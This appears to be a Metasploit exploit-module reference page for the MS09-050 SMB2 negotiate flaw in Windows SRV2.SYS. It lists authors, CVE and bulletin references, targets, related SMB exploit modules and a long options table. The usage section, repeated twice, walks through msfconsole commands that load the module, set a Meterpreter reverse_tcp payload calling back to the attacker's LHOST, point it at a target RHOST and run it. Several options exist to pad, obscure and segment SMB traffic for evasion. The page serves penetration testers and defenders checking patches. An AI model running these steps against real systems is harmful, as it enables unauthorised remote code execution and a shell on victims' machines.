Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
Exploit Rank
- Good
Exploit Authors
- Laurent Gaffie < laurent.gaffie [at] gmail.com >
- hdm < hdm [at] metasploit.com >
- sf < stephen_fewer [at] harmonysecurity.com >
Vulnerability References
- MSB-MS09-050
- CVE-2009-3103
- BID-36299
- OSVDB-57799
- http://seclists.org/fulldisclosure/2009/Sep/0039.html
- http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
Exploit Targets
- 0 - Windows Vista SP1/SP2 and Server 2008 (x86) (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/smb/ms03_049_netapi
- exploit/windows/smb/ms04_007_killbill
- exploit/windows/smb/ms04_011_lsass
- exploit/windows/smb/ms04_031_netdde
- exploit/windows/smb/ms05_039_pnp
- exploit/windows/smb/ms06_025_rasmans_reg
- exploit/windows/smb/ms06_025_rras
- exploit/windows/smb/ms06_040_netapi
- exploit/windows/smb/ms06_066_nwapi
- exploit/windows/smb/ms06_066_nwwks
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads
msf exploit(ms09_050_smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST [MY IP ADDRESS]
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST [TARGET IP]
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads
msf exploit(ms09_050_smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST [MY IP ADDRESS]
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST [TARGET IP]
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 445) |
| WAIT | The number of seconds to wait for the attack to complete. (default: 180) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| Proxies | Use a proxy chain |
| SMB::ChunkSize | The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing |
| SMB::Native_LM | The Native LM to send during authentication |
| SMB::Native_OS | The Native OS to send during authentication |
| SMB::VerifySignature | Enforces client-side verification of server response signatures |
| SMBDirect | The target port is a raw SMB service (not NetBIOS) |
| SMBDomain | The Windows domain to use for authentication |
| SMBName | The NetBIOS hostname (required for port 139 connections) |
| SMBPass | The password for the specified username |
| SMBUser | The username to authenticate as |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| SMB::obscure_trans_pipe_level | Obscure PIPE string in TransNamedPipe (level 0-3) |
| SMB::pad_data_level | Place extra padding between headers and data (level 0-3) |
| SMB::pad_file_level | Obscure path names used in open/create (level 0-3) |
| SMB::pipe_evasion | Enable segmented read/writes for SMB Pipes |
| SMB::pipe_read_max_size | Maximum buffer size for pipe reads |
| SMB::pipe_read_min_size | Minimum buffer size for pipe reads |
| SMB::pipe_write_max_size | Maximum buffer size for pipe writes |
| SMB::pipe_write_min_size | Minimum buffer size for pipe writes |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |